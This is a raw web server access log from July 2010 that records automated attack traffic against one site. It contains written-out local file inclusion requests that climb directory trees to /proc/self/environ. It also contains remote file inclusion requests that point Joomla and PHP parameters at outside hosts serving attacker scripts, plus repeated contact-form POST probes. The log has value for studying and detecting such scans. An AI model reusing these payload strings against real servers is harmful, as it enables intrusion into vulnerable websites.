62.182.63.25 - - [31/Jul/2010:07:21:18 -0700] "GET /logs/access_100701.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:07:21:19 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:07:21:19 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
216.65.69.25 - - [31/Jul/2010:07:21:58 -0700] "GET /logs/access_100428.log/components/com_forum/download.php?phpbb_root_path=http://www.ligadom.com/images/1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.65.69.25 - - [31/Jul/2010:07:21:58 -0700] "GET /logs/access_100320.log/components/com_forum/download.php?phpbb_root_path=http://www.ligadom.com/images/1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.65.69.25 - - [31/Jul/2010:07:22:08 -0700] "GET /logs/access_100428.log/components/com_forum/download.php?phpbb_root_path=http://www.ligadom.com/images/1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.65.69.25 - - [31/Jul/2010:07:22:12 -0700] "GET /logs/access_100320.log/components/com_forum/download.php?phpbb_root_path=http://www.ligadom.com/images/1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:07:22:19 -0700] "GET /logs/access_100625.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:07:22:20 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:07:22:20 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:07:22:46 -0700] "GET /logs/access.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:23:13 -0700] "POST /logs/access_100709.log%20%20//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:23:13 -0700] "POST /logs//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
67.212.178.179 - - [31/Jul/2010:07:23:13 -0700] "GET /logs/access_100609.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
67.212.178.179 - - [31/Jul/2010:07:23:14 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.813" "www.puaga.com"
67.212.178.179 - - [31/Jul/2010:07:23:14 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:23:14 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
67.212.178.179 - - [31/Jul/2010:07:24:42 -0700] "GET /logs/access_100321.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
67.212.178.179 - - [31/Jul/2010:07:25:43 -0700] "GET /index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.813" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:07:26:07 -0700] "GET /logs/access_100717.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:07:26:07 -0700] "GET /logs/access_100717.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:07:26:07 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.810" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:07:26:07 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:07:26:07 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.810" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:07:26:07 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:07:26:39 -0700] "GET /logs/access_100620.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:03 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:03 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:04 -0700] "POST /logs/access_100720.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:04 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:04 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:04 -0700] "POST /logs/access_100720.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:05 -0700] "POST /logs/access_100720.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:05 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:06 -0700] "POST /logs/access_100720.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:06 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:06 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:06 -0700] "POST /logs/access_100720.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:07 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:07 -0700] "POST /logs/access_100720.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:07 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:07 -0700] "POST /logs/access_100720.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:07 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:08 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:27:08 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
218.234.23.94 - - [31/Jul/2010:07:27:57 -0700] "GET /logs/access_100720.log/homepage.php?sel=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.23.94 - - [31/Jul/2010:07:27:57 -0700] "GET /homepage.php?sel=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.23.94 - - [31/Jul/2010:07:27:57 -0700] "GET /logs/homepage.php?sel=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.29.171.35 - - [31/Jul/2010:07:28:06 -0700] "GET /logs/access_100625.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.29.171.35 - - [31/Jul/2010:07:28:06 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.29.171.35 - - [31/Jul/2010:07:28:06 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.234.23.94 - - [31/Jul/2010:07:28:38 -0700] "GET /logs/access_100324.log%20%20/homepage.php?sel=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.212.178.179 - - [31/Jul/2010:07:28:53 -0700] "GET /logs/access_100625.log/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
67.212.178.179 - - [31/Jul/2010:07:28:53 -0700] "GET /index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.813" "www.puaga.com"
67.212.178.179 - - [31/Jul/2010:07:28:53 -0700] "GET /logs/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:28:53 -0700] "GET /admin/classes/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:28:53 -0700] "GET /logs//admin/classes/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:28:53 -0700] "GET /logs/access_100313.log%20%20//admin/classes/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:07:28:55 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.810" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:07:28:56 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.810" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:28:59 -0700] "GET /logs/access_100209.log%20%20//admin/classes/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:29:18 -0700] "GET /logs//admin/classes/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:29:18 -0700] "GET /admin/classes/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:29:18 -0700] "GET /logs/access_100313.log%20%20//admin/classes/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:29:21 -0700] "GET /logs/access_100209.log%20%20//admin/classes/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:31 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:31 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:31 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:31 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:31 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:32 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:32 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:33 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:33 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:33 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:33 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:34 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:34 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:34 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:34 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:35 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:35 -0700] "POST /logs/contact.php HTTP/1.0" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:35 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:36 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:36 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:07:31:37 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
67.212.178.179 - - [31/Jul/2010:07:32:08 -0700] "GET /logs/access_100624.log/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:33:17 -0700] "GET /logs/access_100313.log//admin/classes/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:33:17 -0700] "GET /logs/access_100209.log//admin/classes/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:33:18 -0700] "GET /logs/access_100313.log//admin/classes/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:33:19 -0700] "GET /logs/access_100209.log//admin/classes/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:07:34:00 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:07:34:00 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:07:34:00 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:07:34:00 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:07:34:01 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
92.43.201.28 - - [31/Jul/2010:07:34:13 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
92.43.201.28 - - [31/Jul/2010:07:34:13 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
92.43.201.28 - - [31/Jul/2010:07:34:13 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
119.235.18.12 - - [31/Jul/2010:07:34:40 -0700] "GET /logs/access_100415.log//////?mosConfig_absolute_path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
119.235.18.12 - - [31/Jul/2010:07:34:42 -0700] "GET /////?mosConfig_absolute_path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 200 3640 "-" "libwww-perl/5.813" "www.puaga.com"
119.235.18.12 - - [31/Jul/2010:07:34:46 -0700] "GET /logs//////?mosConfig_absolute_path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 200 25686 "-" "libwww-perl/5.813" "www.puaga.com"
92.43.201.28 - - [31/Jul/2010:07:35:55 -0700] "POST /logs/access_100711.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
200.29.171.35 - - [31/Jul/2010:07:36:47 -0700] "GET /logs/access_100517.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
119.235.18.12 - - [31/Jul/2010:07:38:29 -0700] "GET /logs/access_100410.log//////?mosConfig_absolute_path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:39:54 -0700] "POST /logs/access_100711.log/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:39:55 -0700] "POST /logs/access_100711.log/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:39:56 -0700] "POST /logs/access_100711.log/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:39:57 -0700] "POST /logs/access_100711.log/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:39:58 -0700] "POST /logs/access_100711.log/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:39:59 -0700] "POST /logs/access_100711.log/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:40:00 -0700] "POST /logs/access_100711.log/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
91.208.211.151 - - [31/Jul/2010:07:40:31 -0700] "POST /logs/access_100617.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
91.208.211.151 - - [31/Jul/2010:07:40:31 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
91.208.211.151 - - [31/Jul/2010:07:40:31 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:40:48 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:40:48 -0700] "GET /logs/access_100226.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:40:48 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:40:50 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:40:50 -0700] "GET /logs/access_100226.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:40:50 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:40:58 -0700] "GET /logs/access_100606.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:40:58 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:40:58 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:01 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:01 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:01 -0700] "GET /logs/access_100606.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:18 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:18 -0700] "GET /logs/access_100606.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:18 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:28 -0700] "GET /logs/access_100212.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.137.192.96 - - [31/Jul/2010:07:41:36 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
